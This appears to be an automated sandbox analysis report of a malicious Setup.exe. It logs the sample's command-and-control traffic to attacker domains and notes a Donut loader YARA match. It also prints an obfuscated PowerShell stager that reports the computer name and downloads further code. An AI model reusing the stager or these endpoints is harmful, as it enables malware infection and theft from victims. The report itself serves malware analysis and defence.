                                                                                                              2025-01-05 17:58:18 UTC | 15331 | OUT | Data Raw: 2d 2d 51 48 38 37 51 41 52 38 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 51 48 38 37 51 41 52 38 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 48 38 37 51 41 52 38 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 51 48 38 37 51 41 52 38 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                              Data Ascii: --QH87QAR8HContent-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--QH87QAR8HContent-Disposition: form-data; name="pid"3--QH87QAR8HContent-Disposition: form-data; name="lid"hRjzG3--GAS--QH87QAR8HContent-Dispos
                                                                                                              2025-01-05 17:58:18 UTC | 5180 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75
                                                                                                              Data Ascii: un 4F([:7s~X`nO`i`u
                                                                                                              2025-01-05 17:58:19 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:19 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=sinvcq8bpn34s8jhscvtmasvon; expires=Thu, 01 May 2025 11:44:58 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dBaKFWcg2tIQzhbL7gv8VVoOrqsU%2FkudwJqHUqHvrEbCoV40dXnwladvblzcbfuMzDo8wEclNSF1HUEhVYqayjk0tZ9hAj453geKA%2B6C%2FPpOBg4YTAXLQAroiYeQhoq80M8zbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b0f2837de95-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1642&rtt_var=619&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21465&delivery_rate=1778319&cwnd=242&unsent_bytes=0&cid=0c133cdf3713dc4a&ts=855&x=0"
                                                                                                              2025-01-05 17:58:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              5 | 192.168.2.5 | 49728 | 104.21.64.1 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-05 17:58:20 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=V39DKRJ9WNME5J8KZ2
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 976
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:20 UTC | 976 | OUT | Data Raw: 2d 2d 56 33 39 44 4b 52 4a 39 57 4e 4d 45 35 4a 38 4b 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 56 33 39 44 4b 52 4a 39 57 4e 4d 45 35 4a 38 4b 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 33 39 44 4b 52 4a 39 57 4e 4d 45 35 4a 38 4b 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a
                                                                                                              Data Ascii: --V39DKRJ9WNME5J8KZ2Content-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--V39DKRJ9WNME5J8KZ2Content-Disposition: form-data; name="pid"1--V39DKRJ9WNME5J8KZ2Content-Disposition: form-data; name="lid"hRjzG3--GAS
                                                                                                              2025-01-05 17:58:20 UTC | 1134 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:20 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=jrsijcd96stsjtfjafesc0s98q; expires=Thu, 01 May 2025 11:44:59 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b1DbQS%2FRIk0%2BlcNgRKD%2FgIRAVn2dNfapQsMLFGb4nmnk69nRkkePerVf%2FFpGkjgbKOulPcVWzDwLhnZr3jrWLvP6C%2BtQpoaKjTXfxR6XkBiQ1WopvznBVy2hkyJkQG3r8Kqjrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b19baa8de95-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1650&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1893&delivery_rate=1769696&cwnd=242&unsent_bytes=0&cid=fc3c318a95a03ffd&ts=466&x=0"
                                                                                                              2025-01-05 17:58:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              6 | 192.168.2.5 | 49731 | 104.21.64.1 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-05 17:58:22 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=DCMRVADM4YO11P
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1074
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:22 UTC | 1074 | OUT | Data Raw: 2d 2d 44 43 4d 52 56 41 44 4d 34 59 4f 31 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 44 43 4d 52 56 41 44 4d 34 59 4f 31 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 43 4d 52 56 41 44 4d 34 59 4f 31 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 44 43 4d 52 56 41 44 4d 34 59
                                                                                                              Data Ascii: --DCMRVADM4YO11PContent-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--DCMRVADM4YO11PContent-Disposition: form-data; name="pid"1--DCMRVADM4YO11PContent-Disposition: form-data; name="lid"hRjzG3--GAS--DCMRVADM4Y
                                                                                                              2025-01-05 17:58:22 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:22 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=v5nblfh0i4acvi21ckunfeua27; expires=Thu, 01 May 2025 11:45:01 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uWZDaMy7YYtmr8o%2BUb84vf1N8fTfqXgY5FybYvLGBXZCO%2BP9sLLrm72jX5Oog4%2BlzGbwkgbr4AZ9cAux4VyPAEQAvyxqRryA6k1ZpgCQtqpSHcXYpprzESBYpefrZMs7FukSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b250f968ca1-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1950&rtt_var=752&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1988&delivery_rate=1436301&cwnd=168&unsent_bytes=0&cid=a89a5801681e3f82&ts=538&x=0"
                                                                                                              2025-01-05 17:58:22 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              7 | 192.168.2.5 | 49742 | 104.21.64.1 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-05 17:58:23 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 112
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:23 UTC | 112 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31
                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=C99EB9646F84611709E39FEBDE2EA801
                                                                                                              2025-01-05 17:58:23 UTC | 1136 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:23 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=efoqmi2gmrc3gsl2i70ko8duru; expires=Thu, 01 May 2025 11:45:02 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IR2qkBeLD%2BSC0QLXIx%2F4Db9%2B%2FPzEET%2BZPNrUZ%2Bc7NplA7ouAQEweyJctsFP6wCcztSyDpfkal9Cz1WERvkZel2xHRBPs3QZzqEZ8GVSRGnk7iKaLnuL6K8eRlpym6mPiQh3Rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b2b582f7c6a-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1991&rtt_var=747&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1014&delivery_rate=1466599&cwnd=218&unsent_bytes=0&cid=8d85cdac02928fbc&ts=437&x=0"
                                                                                                              2025-01-05 17:58:23 UTC | 218 | IN | Data Raw: 64 34 0d 0a 2f 63 4e 67 64 4c 66 61 6f 38 69 4d 4a 67 69 47 57 57 71 4a 77 62 58 76 62 41 5a 33 6d 6a 38 37 41 4a 44 4f 34 4d 35 32 49 36 43 6d 75 45 49 42 6c 65 43 42 6f 50 68 53 65 50 56 6a 4e 71 61 64 6d 6f 77 4a 59 51 4b 30 54 46 4e 76 34 4a 4c 50 39 6b 4d 55 6c 4d 2f 31 55 6b 43 44 37 50 2f 6e 2f 45 34 6d 38 69 45 65 71 2b 32 58 69 52 67 6b 54 61 67 54 47 57 57 79 39 4e 47 7a 57 6c 69 43 69 4f 46 61 56 74 2b 75 31 37 6a 2f 48 46 53 70 42 55 58 69 72 64 79 66 47 6e 4d 61 38 30 78 4f 61 62 36 39 69 4b 45 47 66 34 2b 55 72 52 51 72 31 4c 62 54 6c 2f 39 4f 61 61 67 74 45 76 33 6a 6d 63 30 4b 63 6c 57 67 44 78 63 69 39 65 7a 61 2f 67 74 2b 0d 0a
                                                                                                              Data Ascii: d4/cNgdLfao8iMJgiGWWqJwbXvbAZ3mj87AJDO4M52I6CmuEIBleCBoPhSePVjNqadmowJYQK0TFNv4JLP9kMUlM/1UkCD7P/n/E4m8iEeq+2XiRgkTagTGWWy9NGzWliCiOFaVt+u17j/HFSpBUXirdyfGnMa80xOab69iKEGf4+UrRQr1LbTl/9OaagtEv3jmc0KclWgDxci9eza/gt+
                                                                                                              2025-01-05 17:58:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              8 | 192.168.2.5 | 49748 | 185.161.251.21 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-05 17:58:24 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Host: cegu.shop
                                                                                                              2025-01-05 17:58:24 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                              Server: nginx/1.26.2
                                                                                                              Date: Sun, 05 Jan 2025 17:58:24 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Content-Length: 329
                                                                                                              Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                              Connection: close
                                                                                                              ETag: "676c9e2a-149"
                                                                                                              Accept-Ranges: bytes
                                                                                                              2025-01-05 17:58:24 UTC | 329 | IN | Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                              Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.



                                                                                                              Target ID:0
                                                                                                              Start time:12:58:01
                                                                                                              Start date:05/01/2025
                                                                                                              Path:C:\Users\user\Desktop\Setup.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:75'077'735 bytes
                                                                                                              MD5 hash:2FBED9C7F4E671459BA52391D1D2975D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2202431157.000000000078D000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_78d000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3aaabdd48c7c4b557e902866214a5035934f96e822234e7a329f03605e7c2a9e
                                                                                                                • Instruction ID: ccf782c09b3791655889c1bf279ea6d0488c975ff733124f615e9b4a4117a5ec
                                                                                                                • Opcode Fuzzy Hash: 3aaabdd48c7c4b557e902866214a5035934f96e822234e7a329f03605e7c2a9e
                                                                                                                • Instruction Fuzzy Hash: F3B1B79284E3C14FCB138B749CB9555BF70AE2321472E86CFC8D68F4A3E249590AD767
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Offset: 00792000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2202431157.000000000078D000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_78d000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3aaabdd48c7c4b557e902866214a5035934f96e822234e7a329f03605e7c2a9e
                                                                                                                • Instruction ID: ccf782c09b3791655889c1bf279ea6d0488c975ff733124f615e9b4a4117a5ec
                                                                                                                • Opcode Fuzzy Hash: 3aaabdd48c7c4b557e902866214a5035934f96e822234e7a329f03605e7c2a9e
                                                                                                                • Instruction Fuzzy Hash: F3B1B79284E3C14FCB138B749CB9555BF70AE2321472E86CFC8D68F4A3E249590AD767
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Offset: 00793000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2852643199.0000000000798000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_78d000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ee310df1c9b927dd2c23f15d9bedc102c54e774c343281def3c7e8032b1f7b0
                                                                                                                • Instruction ID: ccf782c09b3791655889c1bf279ea6d0488c975ff733124f615e9b4a4117a5ec
                                                                                                                • Opcode Fuzzy Hash: 4ee310df1c9b927dd2c23f15d9bedc102c54e774c343281def3c7e8032b1f7b0
                                                                                                                • Instruction Fuzzy Hash: F3B1B79284E3C14FCB138B749CB9555BF70AE2321472E86CFC8D68F4A3E249590AD767
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2202807145.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Offset: 0072B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_729000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9488ae698026c6ea9d9bb62c2b9aff96aca31eec736d9b2548d590d4e8af9307
                                                                                                                • Instruction ID: b3012ae07565ff2bd8b064fe12a4c77d19b6073903796bc98ef9391fd798f058
                                                                                                                • Opcode Fuzzy Hash: 9488ae698026c6ea9d9bb62c2b9aff96aca31eec736d9b2548d590d4e8af9307
                                                                                                                • Instruction Fuzzy Hash: 8C417E7140E7D29FC7039B348C61A927FB5AE4731471E45DAD4C0CF163E22A595AC762
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2202807145.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Offset: 00729000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_729000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9488ae698026c6ea9d9bb62c2b9aff96aca31eec736d9b2548d590d4e8af9307
                                                                                                                • Instruction ID: b3012ae07565ff2bd8b064fe12a4c77d19b6073903796bc98ef9391fd798f058
                                                                                                                • Opcode Fuzzy Hash: 9488ae698026c6ea9d9bb62c2b9aff96aca31eec736d9b2548d590d4e8af9307
                                                                                                                • Instruction Fuzzy Hash: 8C417E7140E7D29FC7039B348C61A927FB5AE4731471E45DAD4C0CF163E22A595AC762
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2252229474.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Offset: 0075A000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2202431157.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_75a000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 342ecd7a069d2326827b3f5889e5621e7253a701a40c385448bd4a93b9abdbc3
                                                                                                                • Instruction ID: 20e9ddc9eea20f6a43232e6ccccaf4fb86da1ee83ec0c9f254c1c1568d73af89
                                                                                                                • Opcode Fuzzy Hash: 342ecd7a069d2326827b3f5889e5621e7253a701a40c385448bd4a93b9abdbc3
                                                                                                                • Instruction Fuzzy Hash: FE41F33140A7C18FC717CF78C8615CA7FB2EF8731575988EAC8C19E027C26A695ACB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2252229474.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Offset: 0075C000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_75a000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 342ecd7a069d2326827b3f5889e5621e7253a701a40c385448bd4a93b9abdbc3
                                                                                                                • Instruction ID: 20e9ddc9eea20f6a43232e6ccccaf4fb86da1ee83ec0c9f254c1c1568d73af89
                                                                                                                • Opcode Fuzzy Hash: 342ecd7a069d2326827b3f5889e5621e7253a701a40c385448bd4a93b9abdbc3
                                                                                                                • Instruction Fuzzy Hash: FE41F33140A7C18FC717CF78C8615CA7FB2EF8731575988EAC8C19E027C26A695ACB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2202431157.0000000000745000.00000004.00000020.00020000.00000000.sdmp, Offset: 00745000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2219391647.0000000000745000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_745000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 86965024f16a9496b8ee297476960e822b886593cd7e93b89f97e052be941070
                                                                                                                • Instruction ID: 5608afd19137a2e1c23c7a2411ee19b9b235e474e71486df52acc0bd7bb07288
                                                                                                                • Opcode Fuzzy Hash: 86965024f16a9496b8ee297476960e822b886593cd7e93b89f97e052be941070
                                                                                                                • Instruction Fuzzy Hash: D42134651092D08FC313CF34D494A82BFA1FF8B31639E80DCC9C18F427C2A56942CB42